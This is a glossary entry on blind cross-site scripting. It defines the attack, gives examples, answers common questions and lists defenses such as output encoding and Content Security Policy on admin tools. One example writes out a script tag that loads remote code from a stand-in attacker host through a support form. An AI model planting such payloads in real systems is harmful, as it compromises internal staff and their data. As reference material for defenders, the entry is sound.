Blind XSS
What is Blind XSS?
Blind XSS: A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.
Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.
● Examples
- 01: A support form field containing <script src=https://x.attacker/x.js></script> that fires in the agent's CRM.
- 02: A User-Agent header logged into an admin log viewer that does not encode HTML.
● Frequently asked questions
What is Blind XSS?
A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool. It belongs to the Attacks & Threats category of cybersecurity.
What does Blind XSS mean?
A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.
How does Blind XSS work?
Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.
How do you defend against Blind XSS?
Defences for Blind XSS are the same as for stored XSS, applied everywhere the saved data is rendered: context-appropriate output encoding (or sanitization) in every view, including internal tools and log viewers that display user-supplied values such as the User-Agent header, together with a strong Content Security Policy on admin tools so that an injected script cannot load or make its out-of-band callback even if encoding is missed somewhere. Operationally, that means treating internal views that display user-supplied data as part of the application's attack surface.
What are other names for Blind XSS?
Common alternative names include: Out-of-band XSS.
● Related terms
- Cross-Site Scripting (XSS) (attacks № 240): A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- Stored XSS (attacks № 1107): A persistent cross-site scripting flaw where attacker-supplied script is saved on the server and later executed in every visitor's browser.
- Reflected XSS (attacks № 912): A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
- DOM-Based XSS (attacks № 347): An XSS variant where the injection and execution happen entirely in the browser as client-side JavaScript writes untrusted data into a sink without sanitization.
- Content Security Policy (CSP) (appsec № 214): An HTTP response header that tells the browser which sources of scripts, styles, frames and other content are allowed, limiting the impact of XSS and data-injection attacks.
- Output Encoding (appsec № 773): Transforming untrusted data into a form that is safe for a specific output context — HTML, JavaScript, URL, SQL, shell — so it cannot break out and execute as code.